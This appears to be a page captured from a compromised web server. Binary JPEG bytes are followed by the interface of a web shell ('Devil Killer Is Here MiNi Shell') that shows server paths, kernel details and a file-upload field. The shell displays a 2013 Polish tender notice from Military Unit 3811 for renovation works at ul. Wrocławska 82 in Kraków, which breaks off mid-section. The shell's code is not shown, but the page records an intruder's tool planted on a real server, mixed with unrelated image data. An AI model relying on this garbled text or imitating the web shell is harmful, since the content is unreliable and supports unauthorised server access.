JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130425/165838-N-2013.html

<p class="kh_header"><b>Kraków: Roboty budowlane w zakresie branży budowlanej, sanitarnej i elektrycznej polegające na remoncie pomieszczeń wybranych budynków znajdujących się na terenie kompleksu wojskowego przy 
ul. Wrocławskiej 82 w Krakowie administrowanego przez Jednostkę Wojskową nr 3811</b><br>
<b>Numer ogłoszenia: 165838 - 2013; data zamieszczenia: 25.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 3811 , Rząska, ul. Krakowska 2, 30-901 Kraków, woj. małopolskie, tel. +48 12 4555059; 4555116, faks +48 12 4555059, +48 12 4555103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.35wog.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane w zakresie branży budowlanej, sanitarnej i elektrycznej polegające na remoncie pomieszczeń wybranych budynków znajdujących się na terenie kompleksu wojskowego przy 
ul. Wrocławskiej 82 w Krakowie administrowanego przez Jednostkę Wojskową nr 3811.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na remoncie pomieszczeń wybranych budynków znajdujących się na terenie kompleksu wojskowego przy ul. Wrocławskiej 82 w Krakowie, administrowanego przez Jednostkę Wojskową nr 3811. Zakres robót obejmuje branżę budowlaną, sanitarną i elektryczną. 
Zamawiający podzielił przedmiot zamówienia na 2 części:
Przedmiotem zamówienia (część nr 1 ) jest remont w budynku nr 36 w kompleksie wojskowym w Krakowie przy ul. Wrocławskiej 82. 
Wykonawca przed rozpoczęciem robót zobowiązany jest do wystąpienia z wnioskiem o wydanie opinii konserwatorskiej w sprawie wymiany okien. W załączniku do wniosku należy dołączyć szkic okien przewidzianych do wymiany i okien nowych, z wymiarami i sposobem otwierania. W przypadku nieuzyskania zgody na realizację robót w formie określonej w niniejszej specyfikacji technicznej, Wykonawca jest zobowiązany do przedstawienia alternatywnej propozycji i ponownego wystąpienia do wojewódzkiego konserwatora zabytków. 

       W skład remontu wchodzą:
Roboty w zakresie branży budowlanej:
Zakres branży budowlanej obejmuje:
demontaż istniejących okien drewnianych i krat okiennych,
osadzanie stolarki okiennej,
usunięcie drobnych wad powierzchniowych skrzydeł okiennych i ościeżnic,
tynkowanie i malowanie ościeży,
uszczelnienie szczelin pod względem termicznym,
montaż krat i obróbek blacharskich
osadzenie podokienników.

Przedmiotem zamówienia (część nr 2) jest remont budynku nr 40 w kompleksie wojskowym 
w Krakowie przy ul. Wrocławskiej 82. 
 Wykonawca przed rozpoczęciem robót zobowiązany jest do wystąpienia z wnioskiem o wydanie opinii konserwatorskiej w sprawie wymiany okien i naprawy dachu. W załączniku do wniosku należy dołączyć szkic okien przewidzianych do wymiany i okien nowych, z wymiarami i sposobem otwierania. W przypadku nieuzyskania zgody na realizację robót w formie określonej w niniejszej specyfikacji technicznej, Wykonawca jest zobowiązany   do przedstawienia alternatywnej propozycji i ponownego wystąpienia do wojewódzkiego konserwatora zabytków. 

W skład remontu wchodzą:
Roboty w zakresie branży budowlanej:
Zakres branży budowlanej obejmuje:
demontaż istniejącego pokrycia dachowego,  papy izolacyjnej, pełnego   deskowania,
wykonanie pełnego deskowania, położenie papy izolacyjnej oraz montaż łat i kontrłat, ułożenie nowego pokrycia dachu z blachy powlekanej dachówkowej,
wymiana parkietu wraz z podłożem,
remont ścian sali gimnastycznej (nakładanie gładzi gipsowych, tynków mozaikowych, malowanie farbami lateksowymi),
częściowa wymiana istniejącej ślusarki okiennej (luksfery w ramach stalowych) 
na ślusarkę okienną z profili aluminiowych, naklejanie szprosów aluminiowych.

Roboty w zakresie branży sanitarnej:
Zakres branży sanitarnej obejmuje:
wykonanie projektu instalacji centralnego ogrzewania w całym budynku
wykonanie robót polegających na wymianie instalacji centralnego ogrzewania 
w oparciu o sporządzony przez Wykonawcę projekt instalacji c.o. w całym budynku 

Roboty w zakresie branży elektrycznej:
    Zakres branży elektrycznej obejmuje:

Wykonanie  instalacji piorunochronnej.
Montaż i podłączenie opraw świetlówkowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.12.00-2, 45.23.24.60-4, 45.42.11.32-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Dla części nr 1:
4 000,00 zł (słownie: cztery tysiące złotych 00/100 )

Dla części nr 2:
30 000,00 zł (słownie: trzydzieści tysięcy  złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy nie wykluczeni na podstawie art. 24 ustawy Pzp oraz spełniający warunki określone w art. 22 ust. 1 ustawy Pzp i wymagania określone w niniejszej specyfikacji istotnych warunków zamówienia, w szczególności dotyczące:aktualnego na dzień składania ofert odpisu z właściwego rejestru, lub z centralnej ewidencji i informacji o działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do rejestru, lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia powyższy warunek udziału w postępowaniu jeśli wykaże, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał co najmniej:
Dla części nr 1:
2 (dwie) roboty budowlane polegające na wymianie okien w budynku, każda w kwocie nie mniejszej niż 100 000,00 zł brutto (słownie: sto tysięcy  złotych 00/100)

Dla części nr 2:
2 (dwie) roboty budowlane polegające na remoncie lub budowie obiektu  każda w kwocie nie mniejszej niż 500 000,00 zł brutto (słownie: pięćset tysięcy  złotych 00/100),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia tj.:
Dla części nr 1: 
Wykonawca ma obowiązek dysponować personelem do realizacji przedmiotu zamówienia co najmniej po jednej osobie posiadającej uprawnienia budowlane w specjalności konstrukcyjno-budowlanej - do kierowania robotami budowlanymi bez ograniczeń.
Osoby z uprawnieniami budowlanymi muszą posiadać aktualne na dzień składania ofert zaświadczenia z właściwego Oddziału Inżynierów Budownictwa potwierdzające przynależność do tej izby i opłacania wymaganego ubezpieczenia od odpowiedzialności zawodowej. 
Wykonawca ma obowiązek do oferty dołączyć oryginały lub kopie dokumentów uprawnień budowlanych i izby poświadczone za zgodność z oryginałem stwierdzające nadanie odpowiednich uprawnień i przynależność do izby.
Wykonawca ma obowiązek dysponować personelem do realizacji przedmiotu zamówienia co najmniej po jednej osobie posiadającej aktualne na dzień składania ofert uprawnienia do przeprowadzania prac konserwatorskich przy zabytkach. 
Wykonawca ma obowiązek do oferty dołączyć oryginały lub kopie dokumentów kwalifikacji poświadczone za zgodność z oryginałem stwierdzające nadanie odpowiednich kwalifikacji.

Dla części nr 2 :
Wykonawca ma obowiązek dysponować personelem do realizacji przedmiotu zamówienia  co najmniej po jednej osobie posiadającej uprawnienia budowlane 
w każdej z niżej wymienionych specjalności:
konstrukcyjno-budowlanej - do kierowania robotami budowlanymi bez ograniczeń,
instalacyjnej w zakresie sanitarnym - do projektowania bez ograniczeń 
instalacyjnej w zakresie sanitarnym - do kierowania robotami budowlanymi bez ograniczeń
instalacyjnej w zakresie elektrycznym - do kierowania robotami budowlanymi bez ograniczeń.
Osoby z uprawnieniami budowlanymi muszą posiadać aktualne na dzień składania ofert zaświadczenia z właściwego Oddziału Inżynierów Budownictwa potwierdzające przynależność do tej izby i opłacania wymaganego ubezpieczenia od odpowiedzialności zawodowej. 
Wykonawca ma obowiązek do oferty dołączyć oryginały lub kopie dokumentów uprawnień budowlanych i izby poświadczone za zgodność z oryginałem stwierdzające nadanie odpowiednich uprawnień i przynależność do izby.
Wykonawca ma obowiązek dysponować personelem do realizacji przedmiotu zamówienia posiadającym aktualne na dzień składania ofert uprawnienia do przeprowadzania prac konserwatorskich przy zabytkach. 
Wykonawca ma obowiązek do oferty dołączyć oryginały lub kopie dokumentów kwalifikacji poświadczone za zgodność z oryginałem stwierdzające nadanie odpowiednich kwalifikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualne zaświadczenie właściwego dla Wykonawcy Naczelnika Urzędu Skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Zaświadczenie to ma być aktualne na dzień składania ofert.
Aktualne zaświadczenie właściwego dla Wykonawcy oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzającego  że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne,lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem składania ofert. Zaświadczenie to ma być aktualne na dzień składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://35wog.mil.pl/przetargi-rok/2013<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 3811
ul. Krakowska 2, Rząska
woj. Małopolskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2013 godzina 10:30, miejsce: Jednostka Wojskowa 3811
ul. Krakowska 2, Rząska
30-901 Kraków 
 Kancelaria jawna, budynek nr 1, pokój nr 116 ( I piętro) w godzinach 8.00 - 10.00 i 13.00 - 15.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty budowlanepolegające na wymianie stolarki okiennej w budynku 
nr 36 w kompleksie wojskowym przy ul. Wrocławskiej 82 w Krakowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia (część nr 1 ) jest remont w budynku nr 36 w kompleksie wojskowym w Krakowie przy ul. Wrocławskiej 82. 
 Wykonawca przed rozpoczęciem robót zobowiązany jest do wystąpienia z wnioskiem  o wydanie opinii konserwatorskiej w sprawie wymiany okien. W załączniku do wniosku należy dołączyć szkic okien przewidzianych do wymiany i okien nowych, z wymiarami i sposobem otwierania. W przypadku nieuzyskania zgody na realizację robót w formie określonej  w niniejszej specyfikacji technicznej, Wykonawca jest zobowiązany do przedstawienia alternatywnej propozycji i ponownego wystąpienia do wojewódzkiego konserwatora zabytków. 

       W skład remontu wchodzą:
Roboty w zakresie branży budowlanej:
Zakres branży budowlanej obejmuje:
demontaż istniejących okien drewnianych i krat okiennych,
osadzanie stolarki okiennej,
usunięcie drobnych wad powierzchniowych skrzydeł okiennych i ościeżnic,
tynkowanie i malowanie ościeży,
uszczelnienie szczelin pod względem termicznym,
montaż krat i obróbek blacharskich
osadzenie podokienników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.11.32-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Roboty budowlane polegające na remonciesali gimnastycznej w zakresie tynków wewnętrznych, malowania ścian, wymiany parkietu, kontynuacji wymiany ślusarki okiennej, dachu krytego blachą z obróbkami blacharskimi oraz wymiana instalacji centralnego ogrzewania w budynku nr 40
w kompleksie wojskowym przy ul. Wrocławskiej 82 w Krakowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia (część nr 2) jest remont budynku nr 40 w kompleksie wojskowym 
w Krakowie przy ul. Wrocławskiej 82. 
Wykonawca przed rozpoczęciem robót zobowiązany jest do wystąpienia z wnioskiem  o wydanie opinii konserwatorskiej w sprawie wymiany okien i naprawy dachu. W załączniku do wniosku należy dołączyć szkic okien przewidzianych do wymiany i okien nowych, z wymiarami i sposobem otwierania. W przypadku nieuzyskania zgody na realizację robót w formie określonej w niniejszej specyfikacji technicznej, Wykonawca jest zobowiązany  do przedstawienia alternatywnej propozycji i ponownego wystąpienia do wojewódzkiego konserwatora zabytków. 

W skład remontu wchodzą:
Roboty w zakresie branży budowlanej:
Zakres branży budowlanej obejmuje:
demontaż istniejącego pokrycia dachowego,  papy izolacyjnej, pełnego deskowania,
wykonanie pełnego deskowania, położenie papy izolacyjnej oraz montaż łat i kontrłat, ułożenie nowego pokrycia dachu z blachy powlekanej dachówkowej,
wymiana parkietu wraz z podłożem,
remont ścian sali gimnastycznej (nakładanie gładzi gipsowych, tynków mozaikowych, malowanie farbami lateksowymi),
częściowa wymiana istniejącej ślusarki okiennej (luksfery w ramach stalowych) 
na ślusarkę okienną z profili aluminiowych, naklejanie szprosów aluminiowych.

Roboty w zakresie branży sanitarnej:
Zakres branży sanitarnej obejmuje:
wykonanie projektu instalacji centralnego ogrzewania w całym budynku
wykonanie robót polegających na wymianie instalacji centralnego ogrzewania 
w oparciu o sporządzony przez Wykonawcę projekt instalacji c.o. w całym budynku 


Roboty w zakresie branży elektrycznej:
